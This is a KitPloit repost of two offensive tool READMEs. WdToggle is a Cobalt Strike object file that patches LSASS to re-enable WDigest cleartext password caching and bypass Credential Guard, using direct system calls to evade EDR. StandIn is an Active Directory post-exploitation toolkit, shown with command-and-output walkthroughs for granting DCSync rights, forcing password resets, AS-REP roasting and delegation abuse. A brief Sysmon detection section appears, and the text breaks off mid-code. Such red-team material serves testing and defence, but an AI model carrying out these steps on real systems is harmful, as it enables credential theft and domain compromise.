Channel: KitPloit - PenTest Tools!

WdToggle - A Beacon Object File (BOF) For Cobalt Strike Which Uses Direct System Calls To Enable WDigest Credential Caching



A Proof of Concept Cobalt Strike Beacon Object File which uses direct system calls to enable WDigest credential caching and circumvent Credential Guard (if enabled).

Additional guidance can be found in this blog post: https://outflank.nl/blog/?p=1592


Background

This PoC code is based on the following excellent blog posts:

Exploring Mimikatz - Part 1 - WDigest

Bypassing Credential Guard

Utilizing direct system calls via inline assembly in BOF code provides a more opsec safe way of interacting with the LSASS process. Using direct system calls avoids AV/EDR software intercepting user-mode API calls.
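For illustration, a direct system call on x64 boils down to a stub of only a few instructions. This hypothetical Python helper emits those stub bytes; the service number `0x3A` is a placeholder, since real syscall numbers vary per Windows build, and WdToggle itself emits the equivalent via inline assembly at compile time:

```python
import struct

def make_syscall_stub(ssn: int) -> bytes:
    """Build the canonical x64 Nt* syscall stub for a given syscall
    service number (SSN). Illustrative only: BOF code emits this via
    inline assembly rather than constructing bytes at runtime."""
    return (
        b"\x4c\x8b\xd1"                     # mov r10, rcx
        + b"\xb8" + struct.pack("<I", ssn)  # mov eax, <ssn>
        + b"\x0f\x05"                       # syscall
        + b"\xc3"                           # ret
    )

stub = make_syscall_stub(0x3A)  # placeholder SSN; varies per build
print(stub.hex())
```

Because the stub transitions to the kernel directly, any user-mode hooks an EDR placed on the equivalent `ntdll.dll` export are never touched.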

Visual Studio (C++) does not support inline assembly for x64 processors. So, in order to write a single Beacon Object File containing our compiled / assembled code, we must use the Mingw-w64 (GCC for Windows) compiler.


What is this repository for?
  • Demonstrate the usage of direct system calls using inline assembly to provide a more opsec safe way of interacting with the LSASS process.
  • Enable WDigest credential caching by toggling the g_fParameter_UseLogonCredential global parameter to 1 within the LSASS process (wdigest.dll module).
  • Circumvent Credential Guard (if enabled) by toggling the g_IsCredGuardEnabled variable to 0 within the LSASS process (wdigest.dll module).
  • Execute this code within the Beacon process using a Beacon object file.

How do I set this up?

We will not supply compiled binaries. You will have to do this yourself:

  • Clone this repository.

  • Make sure you have the Mingw-w64 compiler installed. On macOS, for example, we can use MacPorts to install Mingw-w64 (sudo port install mingw-w64).

  • Run the make command to compile the Beacon object file.

  • Within a Cobalt Strike Beacon context, run the inline-execute command and provide the path to the WdToggle.o object file.


  • Run the Cobalt Strike logonpasswords command (Mimikatz) and notice that clear-text passwords are enabled again for new user logins or for users who unlock their desktop session.


Limitations
  • This memory patch is not reboot persistent, so after a reboot you must rerun the code.
  • The memory offsets to the wdigest!g_fParameter_UseLogonCredential and wdigest!g_IsCredGuardEnabled global variables can change between Windows versions and revisions. We provide some offsets for different builds, but these can change in future releases. You can add your own version offsets, which can be found using the Windows debugging tools:
C:\Program Files (x86)\Windows Kits\10\Debuggers\x64>cdb.exe -z C:\Windows\System32\wdigest.dll

0:000> x wdigest!g_fParameter_UseLogonCredential
00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information>
0:000> x wdigest!g_IsCredGuardEnabled
00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information>
0:000>
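The addresses printed by cdb are virtual addresses, so the module-relative offsets still need to be derived. A small sketch in Python, assuming wdigest.dll is mapped at the 0x00000001`80000000 base shown above (the parsing helper and its names are illustrative):

```python
import re

# Sample lines as printed by cdb's `x` command in the session above.
CDB_OUTPUT = """\
00000001`800361b4 wdigest!g_fParameter_UseLogonCredential = <no type information>
00000001`80035c08 wdigest!g_IsCredGuardEnabled = <no type information>
"""

# The image base cdb used for wdigest.dll; subtracting it yields a
# module-relative offset usable against wdigest.dll inside LSASS.
MODULE_BASE = 0x1_8000_0000

def parse_offsets(text: str) -> dict:
    """Extract symbol -> module-relative offset from cdb `x` output."""
    offsets = {}
    for hi, lo, symbol in re.findall(
            r"([0-9a-f]{8})`([0-9a-f]{8}) wdigest!(\w+)", text):
        offsets[symbol] = int(hi + lo, 16) - MODULE_BASE
    return offsets

print({k: hex(v) for k, v in parse_offsets(CDB_OUTPUT).items()})
# {'g_fParameter_UseLogonCredential': '0x361b4', 'g_IsCredGuardEnabled': '0x35c08'}
```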

Detection

To detect credential theft through LSASS memory access, we can use a tool like Sysmon. Sysmon can be configured to log processes opening a handle to the lsass.exe process. With this configuration applied, we can gather telemetry for suspicious processes accessing the LSASS process and help detect possible credential dumping activity. Of course, there are more options to detect credential theft, for example using an advanced detection platform like Windows Defender ATP. But if you don't have the budget and luxury of using such platforms, then Sysmon is a free tool that can help fill the gap.
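As a starting point, a minimal Sysmon configuration that records Event ID 10 (ProcessAccess) whenever a process opens a handle to lsass.exe could look as follows; the schemaversion and any GrantedAccess filtering should be adjusted to your Sysmon version and environment:

```xml
<Sysmon schemaversion="4.30">
  <EventFiltering>
    <RuleGroup name="" groupRelation="or">
      <!-- Log Event ID 10 for any process opening a handle to LSASS -->
      <ProcessAccess onmatch="include">
        <TargetImage condition="image">lsass.exe</TargetImage>
      </ProcessAccess>
    </RuleGroup>
  </EventFiltering>
</Sysmon>
```

Expect benign handle activity (e.g. from AV engines) in the resulting telemetry, so baseline before alerting.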


Credits



StandIn - A Small .NET35/45 AD Post-Exploitation Toolkit



StandIn is a small AD post-compromise toolkit. StandIn came about because we recently needed a .NET native solution at xforcered to perform resource-based constrained delegation. However, StandIn quickly ballooned to include a number of comfort features.

I want to continue developing StandIn to teach myself more about Directory Services programming and to hopefully expand a tool which fits in to the AD post-exploitation toolchain.



Roadmap

Contributing

Contributions are most welcome. Please ensure pull requests include the following: a description of the functionality, a brief technical explanation, and sample output.


ToDo's

The following items are currently on the radar for implementation in subsequent versions of StandIn.

  • Domain share enumeration. This can be split into two parts: (1) finding and deduplicating a list based on user home directories / script paths / profile paths, and (2) querying fTDfs / msDFS-Linkv2 objects.
  • Finding and parsing GPOs to map users to host local groups.

Subject References

Index

Help
  __
( _/_ _// ~b33f
__)/(//)(/(/) v0.8


>--~~--> Args? <--~~--<

--help This help menu
--object LDAP filter, e.g. samaccountname=HWest
--computer Machine name, e.g. Celephais-01
--group Group name, e.g. "Necronomicon Admins"
--ntaccount User name, e.g. "REDHOOK\UPickman"
--sid String SID representing a target machine
--grant User name, e.g. "REDHOOK\KMason"
--guid Rights GUID to add to object, e.g. 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
--domain Domain name, e.g. REDHOOK
--user User name
--pass Password
--newpass New password to set for object
--type Rights type: GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync
--spn Boolean, list kerberoastable accounts
--delegation Boolean, list accounts with unconstrained / constrained delegation
--asrep Boolean, list ASREP roastable accounts
--dc Boolean, list all domain controllers
--remove Boolean, remove msDS-AllowedToActOnBehalfOfOtherIdentity property from machine object
--make Boolean, make machine; ms-DS-MachineAccountQuota applies
--disable Boolean, disable machine; should be the same user that created the machine
--access Boolean, list access permissions for object
--delete Boolean, delete machine from AD; requires elevated AD access

>--~~--> Usage? <--~~--<

# Query object properties by LDAP filter
StandIn.exe --object "(&(samAccountType=805306368)(servicePrincipalName=*vermismysteriis.redhook.local*))"
StandIn.exe --object samaccountname=Celephais-01$ --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Query object access permissions, optionally filter by NTAccount
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --access
StandIn.exe --object samaccountname=Rllyeh$ --access --ntaccount "REDHOOK\EDerby"
StandIn.exe --object samaccountname=JCurwen --access --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Grant object access permissions
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --type DCSync
StandIn.exe --object "distinguishedname=DC=redhook,DC=local" --grant "REDHOOK\MBWillett" --guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
StandIn.exe --object samaccountname=SomeTarget001$ --grant "REDHOOK\MBWillett" --type GenericWrite --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Set object password
StandIn.exe --object samaccountname=SomeTarget001$ --newpass "Arkh4mW1tch!"
StandIn.exe --object samaccountname=BJenkin --newpass "Dr34m1nTh3H#u$e" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add ASREP to userAccountControl flags
StandIn.exe --object samaccountname=HArmitage --asrep
StandIn.exe --object samaccountname=FMorgan --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove ASREP from userAccountControl flags
StandIn.exe --object samaccountname=TMalone --asrep --remove
StandIn.exe --object samaccountname=RSuydam --asrep --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all ASREP roastable accounts
StandIn.exe --asrep
StandIn.exe --asrep --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all kerberoastable accounts
StandIn.exe --spn
StandIn.exe --spn --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# List all accounts with unconstrained & constrained delegation privileges
StandIn.exe --delegation
StandIn.exe --delegation --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Get a list of all domain controllers
StandIn.exe --dc

# List group members
StandIn.exe --group Literarum
StandIn.exe --group "Magna Ultima" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add user to group
StandIn.exe --group "Dunwich Council" --ntaccount "REDHOOK\WWhateley"
StandIn.exe --group DAgon --ntaccount "REDHOOK\RCarter" --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Create machine object
StandIn.exe --computer Innsmouth --make
StandIn.exe --computer Innsmouth --make --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Disable machine object
StandIn.exe --computer Arkham --disable
StandIn.exe --computer Arkham --disable --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Delete machine object
StandIn.exe --computer Danvers --delete
StandIn.exe --computer Danvers --delete --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Add msDS-AllowedToActOnBehalfOfOtherIdentity to machine object properties
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543
StandIn.exe --computer Providence --sid S-1-5-21-1085031214-1563985344-725345543 --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

# Remove msDS-AllowedToActOnBehalfOfOtherIdentity from machine object properties
StandIn.exe --computer Miskatonic --remove
StandIn.exe --computer Miskatonic --remove --domain redhook --user RFludd --pass Cl4vi$Alchemi4e

LDAP Object Operations

All object operations expect that the LDAP filter returns a single object and will exit if your query returns more. This is by design.


Get object

Use Case

Operationally, we may want to look at all of the properties of a specific object in AD. A common example would be to look at what groups a user account is a member of or when a user account last authenticated to the domain.


Syntax

Get all properties of the resolved object. Queries can be simple matches for a single property or complex LDAP filters.

C:\> StandIn.exe --object samaccountname=m-10-1909-01$

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[?] Iterating object properties

[+] logoncount
|_ 360
[+] codepage
|_ 0
[+] objectcategory
|_ CN=Computer,CN=Schema,CN=Configuration,DC=main,DC=redhook,DC=local
[+] iscriticalsystemobject
|_ False
[+] operatingsystem
|_ Windows 10 Enterprise
[+] usnchanged
|_ 195797
[+] instancetype
|_ 4
[+] name
|_ M-10-1909-01
[+] badpasswordtime
|_ 0x0
[+] pwdlastset
|_ 10/9/2020 4:42:02 PM UTC
[+] serviceprincipalname
|_ TERMSRV/M-10-1909-01
|_ TERMSRV/m-10-1909-01.main.redhook.local
|_ WSMAN/m-10-1909-01
|_ WSMAN/m-10-1909-01.main.redhook.local
|_ RestrictedKrbHost/M-10-1909-01
|_ HOST/M-10-1909-01
|_ RestrictedKrbHost/m-10-1909-01.main.redhook.local
|_ HOST/m-10-1909-01.main.redhook.local
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
|_ computer
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_MACHINE_ACCOUNT
[+] lastlogontimestamp
|_ 11/1/2020 7:40:09 PM UTC
[+] usncreated
|_ 31103
[+] objectguid
|_ 17c80232-2ee6-47e1-9ab5-22c51c268cf0
[+] localpolicyflags
|_ 0
[+] whencreated
|_ 7/9/2020 4:59:55 PM
[+] adspath
|_ LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] useraccountcontrol
|_ WORKSTATION_TRUST_ACCOUNT
[+] cn
|_ M-10-1909-01
[+] countrycode
|_ 0
[+] primarygroupid
|_ 515
[+] whenchanged
|_ 11/2/2020 7:59:32 PM
[+] operatingsystemversion
|_ 10.0 (18363)
[+] dnshostname
|_ m-10-1909-01.main.redhook.local
[+] dscorepropagationdata
|_ 10/30/2020 6:56:30 PM
|_ 10/25/2020 1:28:32 AM
|_ 7/16/2020 2:15:26 PM
|_ 7/15/2020 8:54:17 PM
|_ 1/1/1601 12:04:17 AM
[+] lastlogon
|_ 11/3/2020 10:21:11 AM UTC
[+] distinguishedname
|_ CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
[+] msds-supportedencryptiontypes
|_ RC4_HMAC, AES128_CTS_HMAC_SHA1_96, AES256_CTS_HMAC_SHA1_96
[+] samaccountname
|_ M-10-1909-01$
[+] objectsid
|_ S-1-5-21-1293271031-3053586410-2290657902-1126
[+] lastlogoff
|_ 0
[+] accountexpires
|_ 0x7FFFFFFFFFFFFFFF

Get object access permissions

Use Case

At certain stages of an engagement, the operator may want to resolve the access permissions for a specific object in AD. Many permissions can offer an operational avenue to expand access or achieve objectives. For instance, a WriteDacl permission on a group could allow the operator to grant themselves permission to add a new user to the group. Tools like SharpHound already reveal many of these DACL weaknesses.


Syntax

Retrieve the Active Directory rules that apply to the resolved object and translate any schema / rights GUIDs to their friendly names. Optionally filter the results by an NTAccount name.

C:\>StandIn.exe --object samaccountname=m-10-1909-01$ --access

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> NT AUTHORITY\SELF
|_ Type : Allow
|_ Permission : CreateChild, DeleteChild
|_ Object : ANY

[+] Identity --> NT AUTHORITY\Authenticated Users
|_ Type : Allow
|_ Permission : GenericRead
|_ Object : ANY

[... Snip ...]

C:\> StandIn.exe --object samaccountname=m-10-1909-01$ --access --ntaccount "MAIN\domainjoiner"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : CN=M-10-1909-01
Path : LDAP://CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\domainjoiner
|_ Group : MAIN\Domain Join

[+] Object access rules

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : DeleteTree, ExtendedRight, Delete, GenericRead
|_ Object : ANY

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Account-Restrictions

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : servicePrincipalName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : dNSHostName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : sAMAccountName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : displayName

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : description

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : WriteProperty
|_ Object : User-Logon

[+] Identity --> MAIN\domainjoiner
|_ Type : Allow
|_ Permission : Self
|_ Object : DS-Validated-Write-Computer
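The GUID-to-friendly-name translation mentioned above boils down to a lookup table. A sketch with a few well-known extended-rights GUIDs (the values are from the published AD schema; the table and helper names are illustrative, not StandIn's internals):

```python
# Well-known Active Directory extended-rights GUIDs -> friendly names,
# per the published AD schema documentation.
RIGHTS_GUIDS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
    "00299570-246d-11d0-a768-00aa006e0529": "User-Force-Change-Password",
}

def friendly_name(guid: str) -> str:
    """Translate a rights GUID; fall back to the raw GUID if unknown."""
    return RIGHTS_GUIDS.get(guid.lower(), guid)

print(friendly_name("1131F6AA-9C07-11D1-F79F-00C04FC2DCD2"))
# DS-Replication-Get-Changes
```

This is also why the `--guid 1131f6aa-...` example under "Grant object access permissions" is equivalent to granting DS-Replication-Get-Changes.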

Grant object access permission

Use Case

With the appropriate rights, the operator can grant an NTAccount special permissions over a specific object in AD. For instance, if an operator has GenericAll privileges over a user account, they can grant themselves or a third-party NTAccount permission to change the user's password without knowing the current password.


Syntax

Add permissions to the resolved object for a specified NTAccount. StandIn supports a small set of pre-defined privileges (GenericAll, GenericWrite, ResetPassword, WriteMembers, DCSync), but it also allows operators to specify a custom rights GUID using the --guid flag.

C:\> whoami
main\s4uuser

C:\> StandIn.exe --group lowPrivButMachineAccess

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Group : lowPrivButMachineAccess
GUID : 37e3d957-af52-4cc6-8808-56330f8ec882

[+] Members

[?] Path : LDAP://CN=s4uUser,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
samAccountName : s4uUser
Type : User
SID : S-1-5-21-1293271031-3053586410-2290657902-1197

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --grant "MAIN\s4uuser" --type DCSync

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Set object access rules
|_ Success, added dcsync privileges to object for MAIN\s4uuser

C:\> StandIn.exe --object "distinguishedname=DC=main,DC=redhook,DC=local" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w19-dc01.main.redhook.local
[?] Object : DC=main
Path : LDAP://DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : BUILTIN\Administrators
|_ Group : BUILTIN\Administrators

[+] Object access rules

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-All

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : DS-Replication-Get-Changes-In-Filtered-Set

Set object password

Use Case

If the operator has User-Force-Change-Password permissions over a user object, they can change the password for that user account without knowing the current password. This action is destructive, as the user will no longer be able to authenticate, which may raise alarm bells.


Syntax

Set the resolved object's password without knowing the current password.

C:\> whoami
main\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\lowPrivButMachineAccess"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\lowPrivButMachineAccess
|_ Type : Allow
|_ Permission : WriteDacl
|_ Object : ANY

C:\> StandIn.exe --object "samaccountname=user005" --grant "MAIN\s4uuser" --type resetpassword

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Set object access rules
|_ Success, added resetpassword privileges to object for MAIN\s4uuser

C:\> StandIn.exe --object "samaccountname=user005" --access --ntaccount "MAIN\s4uUser"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Object access rules

[+] Identity --> MAIN\s4uUser
|_ Type : Allow
|_ Permission : ExtendedRight
|_ Object : User-Force-Change-Password

C:\> StandIn.exe --object "samaccountname=user005" --newpass "Arkh4mW1tch!"

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[+] Object properties
|_ Owner : MAIN\Domain Admins
|_ Group : MAIN\Domain Admins

[+] Setting account password
|_ Success, password set for object
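Under the hood, an LDAP password reset against AD writes the unicodePwd attribute, which the directory expects as the new password wrapped in double quotes and encoded UTF-16LE. A minimal sketch (`encode_unicode_pwd` is a hypothetical helper shown for clarity; StandIn handles this internally):

```python
def encode_unicode_pwd(password: str) -> bytes:
    """Encode a password for AD's unicodePwd attribute: the surrounding
    double quotes must be part of the UTF-16LE encoded value."""
    return f'"{password}"'.encode("utf-16-le")

blob = encode_unicode_pwd("Arkh4mW1tch!")
print(len(blob))  # 28 bytes: 14 characters (12 + 2 quotes) * 2 bytes each
```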

Add/Remove ASREP from object flags

Use Case

If the operator has write access to a user account, they can modify the user's userAccountControl flags to include DONT_REQUIRE_PREAUTH. Doing so allows the operator to request an AS-REP hash for the user, which can be cracked offline. This process is very similar to kerberoasting. This action is not destructive, but it relies on the user having a password that can be cracked in a reasonable timeframe.
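The flag change itself is a simple bitwise OR / AND-NOT on the userAccountControl value. A sketch using the documented flag constants (ADS_USER_FLAG_ENUM); the helper names are illustrative:

```python
# userAccountControl flag values (ADS_USER_FLAG_ENUM)
NORMAL_ACCOUNT       = 0x0000200
DONT_EXPIRE_PASSWD   = 0x0010000
DONT_REQUIRE_PREAUTH = 0x0400000

def add_asrep(uac: int) -> int:
    """Set DONT_REQUIRE_PREAUTH (what --asrep does)."""
    return uac | DONT_REQUIRE_PREAUTH

def remove_asrep(uac: int) -> int:
    """Clear DONT_REQUIRE_PREAUTH (what --asrep --remove does)."""
    return uac & ~DONT_REQUIRE_PREAUTH

uac = NORMAL_ACCOUNT | DONT_EXPIRE_PASSWD  # flags shown for user005 below
print(hex(add_asrep(uac)))  # 0x410200
```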


Syntax

Add and remove DONT_REQUIRE_PREAUTH from the resolved object's userAccountControl flags.

C:\> StandIn.exe --object "samaccountname=user005" --asrep

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD

[+] Updating userAccountControl..
|_ Success

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

C:\> StandIn.exe --object "samaccountname=user005" --asrep --remove

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Object : CN=User 005
Path : LDAP://CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH

[+] Updating userAccountControl..
|_ Success

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 0 object(s) that do not require Kerberos preauthentication..

ASREP

Use Case

This function enumerates all accounts in AD which are currently enabled and have DONT_REQUIRE_PREAUTH as part of their userAccountControl flags. These accounts can be AS-REP roasted; this process is very similar to kerberoasting.


Syntax

Return all accounts that are ASREP roastable.

C:\> StandIn.exe --asrep

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 1 object(s) that do not require Kerberos preauthentication..

[*] SamAccountName : user005
DistinguishedName : CN=User 005,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : NORMAL_ACCOUNT, DONT_EXPIRE_PASSWD, DONT_REQUIRE_PREAUTH
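Behind the scenes, this kind of enumeration is a single LDAP query using the bitwise-AND matching rule (OID 1.2.840.113556.1.4.803) against userAccountControl, typically also excluding disabled accounts. A sketch of such a filter (the exact filter StandIn uses may differ):

```python
BIT_AND = "1.2.840.113556.1.4.803"  # LDAP_MATCHING_RULE_BIT_AND
DONT_REQUIRE_PREAUTH = 0x400000
ACCOUNTDISABLE = 0x2

# Enabled user accounts with Kerberos preauthentication disabled.
asrep_filter = (
    "(&(samAccountType=805306368)"
    f"(userAccountControl:{BIT_AND}:={DONT_REQUIRE_PREAUTH})"
    f"(!(userAccountControl:{BIT_AND}:={ACCOUNTDISABLE})))"
)
print(asrep_filter)
```

Note that the flag values are rendered in decimal (0x400000 = 4194304), as LDAP filters require.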

SPN

Use Case

This function enumerates all accounts in AD which are currently enabled and can be kerberoasted. Some basic account information is added for context: when the password was last set, when the account was last used, and which encryption types are supported.


Syntax

Return all accounts that are kerberoastable.

C:\> StandIn.exe --spn

[?] Using DC : m-w16-dc01.main.redhook.local
[?] Found 1 kerberostable users..

[*] SamAccountName : SimCritical
DistinguishedName : CN=SimCritical,OU=Users,OU=OCCULT,DC=main,DC=redhook,DC=local
ServicePrincipalName : ldap/M-2012R2-03.main.redhook.local
PwdLastSet : 11/2/2020 7:06:17 PM UTC
lastlogon : 0x0
Supported ETypes : RC4_HMAC_DEFAULT
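The kerberoast query mirrors the `--object` example shown earlier in this README: normal user accounts (samAccountType 805306368, i.e. 0x30000000) with any servicePrincipalName set. A sketch:

```python
SAM_NORMAL_USER_ACCOUNT = 0x30000000  # decimal 805306368

# User accounts with at least one SPN registered.
spn_filter = (
    f"(&(samAccountType={SAM_NORMAL_USER_ACCOUNT})"
    "(servicePrincipalName=*))"
)
print(spn_filter)
# (&(samAccountType=805306368)(servicePrincipalName=*))
```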

Unconstrained / constrained / resource-based constrained delegation

Use Case

This function enumerates all accounts that are permitted to perform unconstrained, constrained, or resource-based constrained delegation. These assets can be used to expand access or achieve objectives.


Syntax

Return all accounts that have either unconstrained or constrained delegation permissions, or have inbound resource-based constrained delegation privileges.

C:\> StandIn.exe --delegation

[?] Using DC : m-w16-dc01.main.redhook.local

[?] Found 3 object(s) with unconstrained delegation..

[*] SamAccountName : M-2019-03$
DistinguishedName : CN=M-2019-03,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W16-DC01$
DistinguishedName : CN=M-W16-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[*] SamAccountName : M-W19-DC01$
DistinguishedName : CN=M-W19-DC01,OU=Domain Controllers,DC=main,DC=redhook,DC=local
userAccountControl : SERVER_TRUST_ACCOUNT, TRUSTED_FOR_DELEGATION

[?] Found 2 object(s) with constrained delegation..

[*] SamAccountName : M-2019-04$
DistinguishedName : CN=M-2019-04,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : HOST/m-w16-dc01.main.redhook.local/main.redhook.local
HOST/m-w16-dc01.main.redhook.local
HOST/M-W16-DC01
HOST/m-w16-dc01.main.redhook.local/MAIN
HOST/M-W16-DC01/MAIN
Protocol Transition : False
userAccountControl : WORKSTATION_TRUST_ACCOUNT

[*] SamAccountName : M-2019-05$
DistinguishedName : CN=M-2019-05,OU=Servers,OU=OCCULT,DC=main,DC=redhook,DC=local
msDS-AllowedToDelegateTo : cifs/m-2012r2-03.main.redhook.local
cifs/M-2012R2-03
Protocol Transition : True
userAccountControl : WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION

[?] Found 1 object(s) with resource-based constrained delegation..

[*] SamAccountName : M-10-1909-01$
DistinguishedName : CN=M-10-1909-01,OU=Workstations,OU=OCCULT,DC=main,DC=redhook,DC=local
Inbound Delegation : Server Admins [GROUP]
userAccountControl : WORKSTATION_TRUST_ACCOUNT
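Each delegation flavour above maps to a distinct LDAP marker: a userAccountControl bit for unconstrained, a populated msDS-AllowedToDelegateTo for constrained (with a second bit indicating protocol transition), and a populated msDS-AllowedToActOnBehalfOfOtherIdentity for inbound resource-based delegation. A sketch of those filter fragments (illustrative, not necessarily StandIn's exact queries):

```python
BIT_AND = "1.2.840.113556.1.4.803"          # bitwise-AND matching rule
TRUSTED_FOR_DELEGATION = 0x80000            # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000  # protocol transition

unconstrained = f"(userAccountControl:{BIT_AND}:={TRUSTED_FOR_DELEGATION})"
constrained = "(msDS-AllowedToDelegateTo=*)"
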